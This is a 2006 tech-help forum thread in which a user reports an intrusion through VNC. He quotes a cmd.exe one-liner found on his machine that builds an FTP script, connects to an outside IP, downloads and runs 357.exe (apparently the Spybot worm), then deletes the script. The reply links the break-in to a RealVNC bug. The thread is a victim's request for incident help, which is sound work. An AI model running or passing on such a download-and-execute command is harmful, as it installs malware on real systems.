Solved

I got hacked. Found this command,

Posted on 2006-11-09
1
278 Views
Last Modified: 2010-03-05
I was trouble shooting a time out issue with my internet connection.  During this process I disconnected my switch, then I took my router of the mix.  At this point , my PC was connected directly to my DSL modem.  After 15 minutes past I walked away from my pc for 2 minutes.  I came back to find my VNC icon Black, which means someon was connected, and my Symantec Auto Protect box up on the screen.  I immediatly closed the VNC session.  I then went to run a netstat to see if someone was connected and noticed this string in the command window.

cmd.exe /c del i&echo open 66.16.176.238 12680 > i&echo user 1 1 >> i &echo get 357.exe >> i &echo quit >> i &ftp -n -s:i &357.exe&del i&exit

That same IP address was the ip address that connected to my computer via VNC.  I found it on the event viewer.
I then checked the symantec log and it shows that it blocked the w32.spybot.worm.  Here is what I am guessing.
This bunghole connected to my machine, someone how got into my VNC, and attempted to download a virus, but Norton caught it.

Can anyone tell me for sure what the above command does?
0
Comment
Question by:steveLaMi
1 Comment
 
LVL 47

Accepted Solution

by:
rpggamergirl earned 500 total points
Comment Utility
There are 2 or 3 questions already with similar issues and theirs were caused by the RealVNC bug of some version.

Here's one of the question I found:
http://www.experts-exchange.com/Operating_Systems/WinXP/Q_22051676.html#17903231
0

Featured Post

Why You Should Analyze Threat Actor TTPs

After years of analyzing threat actor behavior, it’s become clear that at any given time there are specific tactics, techniques, and procedures (TTPs) that are particularly prevalent. By analyzing and understanding these TTPs, you can dramatically enhance your security program.

Join & Write a Comment

If you're not part of the solution, you're part of the problem.   Tips on how to secure IoT devices, even the dumbest ones, so they can't be used as part of a DDoS botnet.  Use PRTG Network Monitor as one of the building blocks, to detect unusual…
By this time the large percentage of day-to-day transactions have shifted to mobile banking; here are some overriding areas QAs must investigate while testing mobile banking apps.  
Sending a Secure fax is easy with eFax Corporate (http://www.enterprise.efax.com). First, Just open a new email message.  In the To field, type your recipient's fax number @efaxsend.com. You can even send a secure international fax — just include t…
Access reports are powerful and flexible. Learn how to create a query and then a grouped report using the wizard. Modify the report design after the wizard is done to make it look better. There will be another video to explain how to put the final p…

763 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question

Need Help in Real-Time?

Connect with top rated Experts

7 Experts available now in Live!

Get 1:1 Help Now